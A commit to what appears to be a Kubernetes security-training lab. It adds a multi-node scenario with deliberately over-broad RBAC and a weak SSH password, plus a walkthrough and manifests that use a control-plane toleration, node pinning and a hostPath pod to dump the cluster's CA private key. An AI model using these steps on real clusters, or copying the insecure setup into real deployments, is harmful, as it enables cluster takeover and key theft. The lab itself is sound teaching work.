new scenario with taint override
raesene committed Dec 28, 2020
1 parent 233ee79 commit cbc1822
Showing 6 changed files with 102 additions and 1 deletion.
2 changes: 1 addition & 1 deletion Scenario Setups/ssh-to-create-pod-easy.md
@@ -2,7 +2,7 @@

This cluster has an SSH service exposed on port 32001/TCP, leading to a pod in the cluster with rights to manage pods in the default namespace. To test this, run

- `ansible-playbook ssh-to-create-pods-easy.yml`
- `ansible-playbook ssh-to-create-pod-easy.yml`

Then make a note of the IP address of the Kubernetes cluster with

25 changes: 25 additions & 0 deletions Scenario Setups/ssh-to-create-pod-multi-node.md
@@ -0,0 +1,25 @@
## SSH to Create Pod - Multi Node

This cluster has an SSH service exposed on port 32001/TCP, leading to a pod in the cluster with rights to manage pods in the default namespace. To test this, run

- `ansible-playbook ssh-to-create-pod-multi-node.yml`

Then make a note of the IP address of the worker node in the cluster by running

```
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' sshcpmn-worker
```

Connect to your client container

```
docker exec -it client /bin/bash
```

and from there

```
ssh -p 32001 sshuser@[worker node ip]
```

The password for the sshuser account is `sshuser`.
24 changes: 24 additions & 0 deletions Scenario Walkthroughs/ssh-to-create-pod-multi-node.md
@@ -0,0 +1,24 @@
## SSH to Create Pod - Multi Node

## Compromising the cluster

1. `kubectl get po -n kube-system` will fail (the user doesn't have those rights)
2. `kubectl get po` will work and give you a list of pods in the default namespace

At this point there are several ways to achieve the goal; let's go with a `hostPath` volume. However, as this is a multi-node cluster, we need to make sure that our pod lands on the control-plane node, which is where the key is available.

3. Two changes to the keydumper manifest are needed to make this work. First, copy the `/key-dumper-pod.yml` file to `/home/sshuser/`, then add the following lines to the `spec` section of the manifest so that the pod tolerates the control-plane taint:
```yaml
tolerations:
- key: node-role.kubernetes.io/master
  effect: NoSchedule
```
4. Next we need to pin the pod to that node: get the node names with `kubectl get nodes`, then add the following line to the `spec` section of the manifest.
```yaml
nodeName: sshcpmn-control-plane
```
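Taken together, the two additions sit side by side in the manifest's `spec` section. This is an illustrative sketch of just those additions (the rest of the pod spec is whatever the original keydumper manifest contains):

```yaml
spec:
  # Tolerate the taint so the scheduler will consider the control-plane node
  tolerations:
  - key: node-role.kubernetes.io/master
    effect: NoSchedule
  # Bypass scheduling entirely and bind the pod to the named node
  nodeName: sshcpmn-control-plane
```

Note that `nodeName` alone is not enough: a pod bound to a tainted node without a matching toleration will be rejected by the kubelet, which is why both changes are needed.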


5. Now create the pod that dumps out the PKI private key: `kubectl create -f keydumper.yml`
6. The key should then be in the pod's logs: `kubectl logs keydumper-pod`
7. Profit!
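For reference, a minimal key-dumper pod of this style mounts the node's PKI directory via `hostPath` and cats the key. This is an illustrative sketch, not the repository's actual `key-dumper-pod.yml`; the image, volume name, and target key path (`/etc/kubernetes/pki/ca.key`, the standard kubeadm location) are assumptions:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: keydumper-pod
spec:
  tolerations:
  - key: node-role.kubernetes.io/master
    effect: NoSchedule
  nodeName: sshcpmn-control-plane
  restartPolicy: Never
  volumes:
  - name: pki
    hostPath:
      path: /etc/kubernetes/pki
  containers:
  - name: keydumper
    image: busybox
    command: ["cat", "/pki/ca.key"]
    volumeMounts:
    - name: pki
      mountPath: /pki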
3 changes: 3 additions & 0 deletions attacker_manifests/noderoot.yml
@@ -7,6 +7,9 @@ metadata:
  name: noderootpod
  labels:
spec:
  tolerations:
  - key: node-role.kubernetes.io/master
    effect: NoSchedule
  hostNetwork: true
  hostPID: true
  hostIPC: true
6 changes: 6 additions & 0 deletions kubeadm_configs/multi-node-cluster.yml
@@ -0,0 +1,6 @@
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4

nodes:
- role: control-plane
- role: worker
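kind treats the `nodes` list as the cluster topology, so larger test clusters are just a longer list. A sketch of a three-node variant (not part of this commit):

```yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4

nodes:
- role: control-plane
- role: worker
- role: worker
```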
43 changes: 43 additions & 0 deletions ssh-to-create-pods-multi-node.yml
@@ -0,0 +1,43 @@
#!/usr/bin/env ansible-playbook
---
- name: Start up a kind cluster
  hosts: localhost
  vars:
    cluster_name: sshcpmn
    # This needs to be the cluster name with -control-plane added
    container_name: sshcpmn-control-plane
    cluster_config: multi-node-cluster.yml
    kubernetes_version: v1.18.2

  tasks:
    - import_tasks: ./ansible_tasks/setup_kind_custom_config.yaml

- name: Setup Cluster
  hosts: sshcpmn-control-plane
  connection: docker
  vars:
    ansible_python_interpreter: /usr/bin/python3

  tasks:
    - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
    - import_tasks: ./ansible_tasks/setup_ssh_pod.yml

    - name: Copy Role Manifest
      copy:
        src: ./manifests/pod-manager.yml
        dest: /root

    - name: Apply Role Manifest
      command: kubectl create -f /root/pod-manager.yml

    - name: Give the default service account rights to manage pods
      command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts

    - name: Create a clusterrole for reading nodes
      command: kubectl create clusterrole node-reader --verb=get,list --resource=nodes

    - name: Give the default service account rights to get nodes
      command: kubectl create clusterrolebinding serviceaccounts-read-nodes --clusterrole=node-reader --group=system:serviceaccounts

    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
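The two `kubectl create` RBAC binding commands and the `clusterrole` command correspond to the following declarative manifests, reconstructed from the command arguments as a sketch (the `pod-manager` Role's own rules live in `manifests/pod-manager.yml` and are not shown here):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: node-reader
rules:
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: serviceaccounts-pod-manager
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: pod-manager
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:serviceaccounts
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: serviceaccounts-read-nodes
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: node-reader
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:serviceaccounts
```

Binding to the `system:serviceaccounts` group deliberately grants these rights to every service account in the cluster, which is what makes the scenario exploitable from the SSH pod.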
